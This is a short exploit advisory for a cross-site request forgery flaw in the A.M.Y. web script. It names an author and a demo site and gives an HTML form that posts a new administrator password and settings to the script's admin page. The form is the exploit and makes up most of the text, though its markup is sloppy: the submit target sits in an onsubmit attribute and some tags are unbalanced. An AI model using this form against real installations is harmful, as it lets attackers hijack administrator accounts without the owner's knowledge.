A.M.Y. suffers from a cross site request forgery vulnerability.
c63b34237d326f3eec696f289261c47f7cdaa0a09f82841ae4516ae7a3688cf9
# Exploit Title: A.M.Y CSRF (change admin password)
# Author: Jonturk75
# Category:: webapps
# Demo site: http://calendarscripts.info/demos/amy/admin.php
<form onsubmit="amy/admin.php;" method="post">
<input type="password" size="30" name="adminpass"/></p>
<input type="password" size="30" name="repass"/></p>
<input type="hidden" value="1" name="changepass"/>
<p><input type="checkbox" checked="" value="1" name="email_on_signup"/> Email me when a new advertiser signs up.</p>
<input type="text" size="30" value="paypal@mysite.com" name="paypal"/></p>
<p align="center"><input type="submit" value="Save Settings"/></p>